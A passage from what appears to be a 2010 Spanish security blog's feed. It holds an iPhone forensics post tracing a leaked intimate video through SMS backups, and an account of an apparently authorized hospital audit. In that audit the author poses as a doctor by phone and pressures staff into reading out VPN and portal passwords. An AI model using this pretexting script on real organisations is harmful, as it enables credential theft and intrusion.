&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;/span&gt;También hay que tener en cuenta que estos ficheros se pueden cifrar desde el propio programa de Itunes, (este no es el caso) y si así fuera se complicaria el análisis forense&lt;br /&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;¡¡EMPEZAMOS!!&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Como hemos comentado anteriormente disponemos de una carpeta llamada '&lt;span style="font-size: small;"&gt;&lt;strong&gt;0387fecb24b358ec337ab2ad3323fb8e0bbc27ca'&amp;nbsp;&lt;/strong&gt;&lt;/span&gt; que contiene los ficheros a buscar. En la investigación me voy a centrar en los SMS's por ver si ha mandado algún mensaje a otro chico, indicando la posibilidad de que se descarge el vídeo y también voy a ver si contiene el vídeo en cuestión en el ordenador.&lt;br /&gt;&lt;br /&gt;Algunos ficheros 'mddata' en sus metadatos tienen una estructura basada en SQLite. Para buscar que ficheros son los del SMS's y llamadas, voy a recurrir a la utilidad 'grep' (para windows) y voy a buscar un patron que suelen estar en la estructura de ficheros.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Patrones de búsqueda:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;sms.db&lt;/b&gt;: SMS&lt;br /&gt;&lt;b&gt;call_history.db&lt;/b&gt;: Historico de llamadas&lt;br /&gt;&lt;b&gt;notes.db&lt;/b&gt;: Agenda y notas&lt;br /&gt;&lt;br /&gt;En la siguiente pantalla se ha realizado en tres ordenes para el entendimiento del lector (se podría hacer en una línea)&lt;br /&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/S8RNRLuLqzI/AAAAAAAABnw/mBo1RUq2zvc/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="136" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/S8RNRLuLqzI/AAAAAAAABnw/mBo1RUq2zvc/s400/Captura.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Como podemos observar devuelve tres ficheros con extensión .mdinfo, como ya hemos dicho anteriormente a cada fichero .mdinfo le corresponde su fichero de igual nombre pero con extensión .mddata . Vamos a comprobar si realmente tiene un formato SQLite, para ello lo abrimos con un editor Hexadecimal y este es el resultado:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/S8R_gU7pzDI/AAAAAAAABn4/3npn7v5Wx38/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/S8R_gU7pzDI/AAAAAAAABn4/3npn7v5Wx38/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Se aprecia que es SQLite 3 y además se ve algún fragmento de texto de un SMS. Para que sea más sencillo su uso los vamos a tratar con SQLite Administrator para ver la información que contienen. &lt;br /&gt;&lt;br /&gt;Este es el resultado del primer fichero 3d0d....:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/S8SDVNuNLvI/AAAAAAAABoA/YCo4CObvPas/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/S8SDVNuNLvI/AAAAAAAABoA/YCo4CObvPas/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp; Los datos se han truncado por motivos confidenciales, pero se ven tres columnas relativas al número de móvil que se envía, la fecha y el texto.&lt;br /&gt;&lt;br /&gt;En la siguiente pantalla y tras una búsqueda nos da un mensaje revelador. Tenemos la evidencia relativa de que 'algo' se ha subido a internet....&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/S8SDupAtSKI/AAAAAAAABoI/zz_mTlGiwsA/s1600/Captura2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="20" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/S8SDupAtSKI/AAAAAAAABoI/zz_mTlGiwsA/s320/Captura2.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Según se trata es filestube y no rapidshare (o son ambos), eso significa que el vídeo en cuestión sigue en circulación&lt;span style="font-size: small;"&gt;&lt;strong&gt;.&lt;/strong&gt;&lt;/span&gt; Vamos a comprobar si somos capaces de encontrarlo en internet en base a una búsqueda de este patron en los ficheros .mddata, para ello empleamos la siguiente sintaxis:&lt;br /&gt;&lt;br /&gt;&lt;div style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;&lt;i&gt;&lt;span style="font-size: x-small;"&gt;grep -l "&lt;media:content filestube="" http:="" url:=""&gt;&lt;/media:content&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;Tras una búsqueda en múltiples ficheros damos con el resultado. Nota: se han trucado algunos datos&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/S8SLKqMfzpI/AAAAAAAABoQ/TJOmaiv0EkA/s1600/Captura2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="35" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/S8SLKqMfzpI/AAAAAAAABoQ/TJOmaiv0EkA/s640/Captura2.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;Si accedemos a la web vemos a la chica tal y como vino al mundo...&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/S8SN27JiztI/AAAAAAAABog/ZN-CjHlBazY/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="226" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/S8SN27JiztI/AAAAAAAABog/ZN-CjHlBazY/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;En el siguiente post veremos si el vídeo esta en el equipo y que medios utilizamos para verificarlo.&lt;span style="font-size: small;"&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-2719030258528437436?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/2719030258528437436/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=2719030258528437436' title='29 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2719030258528437436'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2719030258528437436'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/04/te-puede-pasar-tiforensics-iphone-parte.html' title='Te puede pasar a ti...(Forensics Iphone) PARTE I'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_7dOLVYBL8vA/S8RBOTLJ99I/AAAAAAAABno/Ge-CzXZ4UX8/s72-c/Captura.JPG' height='72' width='72'/><thr:total>29</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-1542785681756202696</id><published>2010-04-08T10:09:00.001+02:00</published><updated>2010-04-08T10:12:06.263+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Amigos'/><title type='text'>YJ</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/S72GYeWkydI/AAAAAAAABnA/h_Pm7jdvPz0/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="73" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/S72GYeWkydI/AAAAAAAABnA/h_Pm7jdvPz0/s200/Captura.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;En la pasada Rooted lo conocí de primera mano, &lt;a href="http://www.security-projects.com/"&gt;&lt;b&gt;&lt;span style="color: #3d85c6;"&gt;YJ&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/a&gt; es una persona increíble, un hacker de los de antes, un hacker blanco (o quízas algo gris, con un pasado 'under' que siempre es interesante) que escribe en un blog muy importante y que no voy a decir aquí por su dificultad en la traducción 'seguridadpordefecto' u algo así, ;-) (los maños lo decimos de otra forma 'u te securizas u a tomar pol culo'...)&lt;br /&gt;&lt;br /&gt;Cosas que pasan...esta es mi historia con el...&lt;br /&gt;&lt;br /&gt;Yago..(joder..la jodí di su nombre) es un maño emigrado a Madrid, una persona de esas con principios, cosas que ya son difíciles de ver en las personas...cuando lo conocí no nos cantamos jotas, pero es de esas personas que en las fiestas del pilar comparten litronas sin saber quien eres y eso marca la diferencia.&lt;br /&gt;&lt;br /&gt;Su calidad técnica es incuestionable y en 'la noche me confunde en Madrid' lo demostró, compartimos hackeos memorables, técnicas de intrusión y algun exploit tipo 0 Day como 'brute force girls'...(si este post lo lee su novia, que este tranquila a YJ le falta el shellcode, y se paso todal noche /dev/null)&lt;br /&gt;&lt;br /&gt;Nos hizo de experto (muy experto) pero eso sí con caballerosidad , como muy buen maño, sin ansia viva, y con conocimiento del medio. Vivimos momentos buenos y proyectos en los que está inmerso muy, muy chulos e interesantes.&lt;br /&gt;&lt;br /&gt;Volviendo al experto, al hacker blanco...YJ es el autor de muchas de las tools que tengo en mi caja de herramientas, entre ellas , PATRIOT, UNHIDE (anda que no me ha venido bien esta tool)..y un huevo más..que espero siga desarrollando.&lt;br /&gt;&lt;br /&gt;También tuve el honor de conocer a los demás integrantes de ese blog famoso, (aunque a Alejandro Ramos ya lo conocía de otras guerras ;-) )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En ese blog tan famoso lo componen el propio &lt;b&gt;YJ, Alejandro Ramos&lt;/b&gt;, (Tío, siento no poder ayudarte en el reto, otra vez será, pero cuento contigo para unos proyectos de PUT.MDR.), &lt;span style="font-family: inherit; font-size: small;"&gt;&lt;span style="font-weight: bold;"&gt;José  A. Guasch&lt;/span&gt;, (un crack en esto de la seguridad, hace tiempo, mucho tiempo que el tío se lo curra muy bien), &lt;b&gt;Laura García,&lt;/b&gt; (Un encanto de señorita, que sabe un huevo y lo tiene muy claro ¡¡ una mujer en seguridad!! o diossss, milagro), &lt;b&gt;Lorenzo Martinez&lt;/b&gt;, (&lt;/span&gt;&lt;span style="font-family: inherit; font-size: small;"&gt;Autentico gurú de la seguridad  perimetral y networking, y ademas lo confirmo de verdad, otro de los maestros).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: inherit; font-size: small;"&gt;Ya se que este post no es técnico pero habla de ellos, que gracias a sus noticias interesantes y sin ánimo de lucro ayudan a muchas personas&amp;nbsp; a iniciarse y continuar en el mundo de la seguridad.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-1542785681756202696?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/1542785681756202696/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=1542785681756202696' title='6 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1542785681756202696'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1542785681756202696'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/04/yj.html' title='YJ'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_7dOLVYBL8vA/S72GYeWkydI/AAAAAAAABnA/h_Pm7jdvPz0/s72-c/Captura.JPG' height='72' width='72'/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-2042026660661982765</id><published>2010-04-08T00:18:00.003+02:00</published><updated>2010-04-08T10:26:00.187+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria social'/><title type='text'>HOSPITAL (Parte 1 - Ingeniería social)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/S70ERkwWSjI/AAAAAAAABm4/yT1jr6JH7ZE/s1600/hospital.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="161" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/S70ERkwWSjI/AAAAAAAABm4/yT1jr6JH7ZE/s200/hospital.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DISCLAIMER&lt;/b&gt;:&lt;br /&gt;&lt;br /&gt;Hola esta serie de entradas que veréis en las próximos días &lt;b&gt;han sido aceptados para su difusión por parte del Hospital que nos contrato para esta auditoria.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Como veréis han sido eliminados nombres y datos que consideramos confidenciales, de todas formas agradeceremos que si nos colamos en algo nos lo hagáis saber.&lt;br /&gt;&lt;br /&gt;La utilidad de este post y los siguientes creo que viene dado porque hemos realizado algo que es muy poco común en las auditorias entre ellas Ingeniería social y otros métodos poco comunes, eso si, todo ello con objeto de que aprendamos todos, yo también incluido.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;***************&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;EMPEZAMOS&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;**************&lt;br /&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Tal y como comente en el post anterior vamos a mostrar en diferentes entradas del blog la revisión del estado del arte de la seguridad de un Hospital .&lt;br /&gt;&lt;br /&gt;Todo nace hace aproximadamente a mediados de Enero cuando el Consejo de Administración de este hospital (entenderéis que no de nombres) se da cuenta de una fuga importante de datos de pacientes y robo de material informático.&lt;br /&gt;&lt;br /&gt;Tras una somera revisión por parte de los informáticos del centro se concluye que la desaparición consiste en diversos discos duros (pendrives), cintas de backup y dos portátiles. Ni que decir tiene que prácticamente se llevaron la información de la empresa.&lt;br /&gt;&lt;br /&gt;Tras hablar con los responsables técnicos y el presidente del Consejo de Administración, se nos da vía libre para realizar una revisión que yo la clasifico como 'brutal' por el alcance que tiene dado que entre las revisiones típicas de seguridad, en esta ocasión vamos a emplear técnicas de ingenieria social.&lt;br /&gt;&lt;br /&gt;Nuestro objetivo en esta primera parte de la auditoria consistía en tres elementos básicos:&lt;br /&gt;&lt;br /&gt;1.- Obtener el máximo de información, de forma telefónica, suplantando la identidad de un conocido doctor del centro, esto incluye obtener perfiles, y contraseñas&lt;br /&gt;&lt;br /&gt;2.- Obtención de accesos reservados solo para empleados, es decir acceso a diversas partes del portal de empleado (web) &lt;br /&gt;&lt;br /&gt;3.- El paso más importante y divertido de la revisión, hacernos pasar por médicos del centro y acceder a zonas reservadas, entre ellas el CPD. Evidentemente queríamos comprobar los elementos de seguridad física del centro.&lt;br /&gt;&lt;br /&gt;Para ello lo más sencillo y tras disponer de la autorización del consejo (en contrato y por escrito) nos disponemos a comenzar buscando en Google. En este ejemplo (&lt;b&gt;que no es el caso que estamos tratando&lt;/b&gt;) proporciona tanta información a un supuesto atacante, que básicamente tiene todo el mapa de red. Cuidado con lo que se publica por internet&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ejemplo de google:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;http://www.networkworld.es/La-sanidad-camina-con-Wi-Fi:-Hospital-de-La-Morale/seccion-/articulo-177043&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Casi el 100% tiene publicado en su web la lista de médicos especialistas en la propia web corporativa de la empresa. Nosotros la obtenemos de otra web con objeto de no dejar rastro de IP's.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;Nuestro objetivo es disponer de personalidades importantes dentro del hospital, para ello y no complicarnos la vida seleccionamos un conocido psicólogo del centro, (al cual ya pedimos perdones y excusas cuando finalizamos el trabajo.)&lt;br /&gt;&lt;br /&gt;He aquí que me hago pasar por el excelentísimo Doctor Juan Aguirre (nombre falso en este post) ( por cierto Eduardo será el doctor en persona quien se persone en el centro, pero eso en la siguiente entrada)&lt;br /&gt;&lt;br /&gt;Lo primero es llamar desde una cabina de teléfono (no vamos a dejar rastro de centralitas ni números personales ni nada de nada), también pensamos hacerlo desde un locutorio de esos que tantos existen.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTA: Tenemos la conversación grabada&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Vamos a llamar al 'call center'&amp;nbsp; 902 34 XX XX XX...&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;operadora&lt;/b&gt;) Hola buenas tardes le atiende María, ¿en que le puedo atender?&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;Yo&lt;/b&gt;) Humm. Hola buenas tardes soy el doctor Aguirre, responsable del área de psicología del centro.&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;operadora&lt;/b&gt;) Ah, esto, hola Sr. Aguirre, ¿que desea?&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;yo&lt;/b&gt;) Mira estoy en un congreso en aquí en Madrid en el&amp;nbsp; San Antonio Breast Cancer Symposium, necesito recuperar un fichero del portal web y no recuerdo la contraseña.&lt;br /&gt;&lt;br /&gt;http://www.congresos-medicos.com/congresos/conclusiones-del-32nd-san-antonio-breast-cancer-symposium-4380&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;operadora&lt;/b&gt;) Ya ¿y no lo tiene anotado? (empiezo a alucinar, ¿anotado?),&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;Yo&lt;/b&gt;)&amp;nbsp; estooo ¿debería?, lo siento pero no. ¡¡ Señorita es muy urgente empiezo la conferencia en 35 minutos!!&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;operadora&lt;/b&gt;) Es que no le puedo dar esta información por teléfono, lo siento&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;Yo&lt;/b&gt;) (un poco borde lo se) ¡¡ Oiga, no se quien es usted pero necesito la contraseña YA!!, el éxito del centro depende de los datos que de y si usted no me lo proporciona, tendré que hablar con su responsable, por favor pongámonos al habla con el ahora mismo, ya!!&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;operadora&lt;/b&gt;), Escuche señor, es imposible, no le puedo dar esos datos.&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;yo&lt;/b&gt;) (mas borde), Mire ¿como dijo que se llama? ¿María?, me caguen la hostia si no me da ahora mismo esa contraseña, le hago culpable si no puedo tener esos datos ahora mismo, mire mi curriculum y mis datos dentro de portal, si quiere le digo mi DNI (ahí fue arriesgado, pero dudo que esos datos estén en el portal), si quiere le digo mi número de colegiado (ahí si que me pase).&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;operadora&lt;/b&gt;) (muy compungida...pobre), Espere que pongo el manos libres y le paso con la responsable del servicio...(unos 40 segundos de espera)...&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;responsable&lt;/b&gt;) Hola Doctor Aguirre, perdone por la espera, mi nombre es Lucia ¿donde dice que esta?&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;yo&lt;/b&gt;) Señorita, estoy desesperado estoy en en el&amp;nbsp; San Antonio Breast Cancer Symposium, compruébelo en mi agenda personal. (Aquí se acabo todo ,pensé)&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;responsable&lt;/b&gt;) Lo siento, perdone no tengo acceso a su agenda, pero lamento todo y no se preocupe tome nota (¿que tome nota?) . La contraseña de su acceso a la red (vpn) es 'aguirre5656' y el acceso al portal es '5656aguirre'. De todos modos le informo que la conversación ha sido grabada por nuestros sistemas informáticos y que a su vuelta le será verificado por el sistema. (por cierto contraseña muy rebuscada) &lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;yo&lt;/b&gt;) (sin entender nada de lo que ha dicho)..uhmm gracias, señorita ha sido muy amable, da gusto el servicio prestado.&lt;br /&gt;&lt;br /&gt;.- (&lt;b&gt;responsable&lt;/b&gt;) Gracias buenas tardes.&lt;br /&gt;&lt;br /&gt;Llegados a este paso solo nos queda configurar el acceso a la VPN (cosa muy sencilla dado que en su página web pública (craso error)&amp;nbsp; explica como se realiza para todos los médicos interinos, y médicos asociados)&lt;br /&gt;&lt;br /&gt;Una vez configurado el acceso por SSL con Open VPN, esto es lo que tenemos...&lt;br /&gt;&lt;br /&gt;Pero esto lo vereis en el blog de &lt;a href="http://hacking-avanzado.blogspot.com/" style="color: #0b5394;"&gt;eduardo&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-2042026660661982765?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/2042026660661982765/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=2042026660661982765' title='9 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2042026660661982765'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2042026660661982765'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/04/hospital-parte-1-ingenieria-social.html' title='HOSPITAL (Parte 1 - Ingeniería social)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_7dOLVYBL8vA/S70ERkwWSjI/AAAAAAAABm4/yT1jr6JH7ZE/s72-c/hospital.jpg' height='72' width='72'/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-7532825662777258894</id><published>2010-04-05T11:25:00.001+02:00</published><updated>2010-04-08T10:12:44.824+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='forense'/><title type='text'>¡¡Semifinalistas!!</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/S7mrYuEOtkI/AAAAAAAABmY/QFR9Zwho6EQ/s1600/Captura.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/S7mrYuEOtkI/AAAAAAAABmY/QFR9Zwho6EQ/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Independientemente de que en los próximos días saldrá publicado la entrada de la mega auditoría del Hospital, quería comunicaros que mi amigo "Juanito" (alias "silverhack", del famoso blog de&lt;span style="color: #0b5394;"&gt; &lt;/span&gt;&lt;a href="http://windowstips.wordpress.com/" style="color: #0b5394;"&gt;el diario de juanito&lt;/a&gt; ) y yo mismo, hemos participado en un reto forense en el que hemos quedado semifinalistas y como dice juanito, no está mal para haberle dedicado un par de tardes.&lt;br /&gt;&lt;br /&gt;Este reto está enmarcado en el "&lt;a href="http://forensicscontest.com/"&gt;&lt;span style="color: #0b5394;"&gt;Network Forensics Puzzle Contest&lt;/span&gt;&lt;/a&gt;" de la prestigiosa firma de SANS y mas concretamente en el apartado "Computer Forensic Investigations and Incident Response Blog"&lt;br /&gt;&lt;br /&gt;Los resultados técnicos y el 'making off' de las pruebas las tendréis en el propio&lt;span style="color: #0b5394;"&gt; &lt;/span&gt;&lt;a href="http://windowstips.wordpress.com/" style="color: #0b5394;"&gt;blog de silverhack&lt;/a&gt;, el cual se ha comprometido a poner varias entradas sobre este tema.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/S7mqAop1QvI/AAAAAAAABmQ/N1xNZSyO1rI/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/S7mqAop1QvI/AAAAAAAABmQ/N1xNZSyO1rI/s320/Captura.JPG" width="249" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-7532825662777258894?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/7532825662777258894/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=7532825662777258894' title='10 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/7532825662777258894'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/7532825662777258894'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/04/semifinalistas.html' title='¡¡Semifinalistas!!'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_7dOLVYBL8vA/S7mrYuEOtkI/AAAAAAAABmY/QFR9Zwho6EQ/s72-c/Captura.JPG' height='72' width='72'/><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-3512345829821337510</id><published>2010-03-26T10:19:00.001+01:00</published><updated>2010-03-26T10:21:53.902+01:00</updated><title type='text'>Estaros atentos!!!</title><content 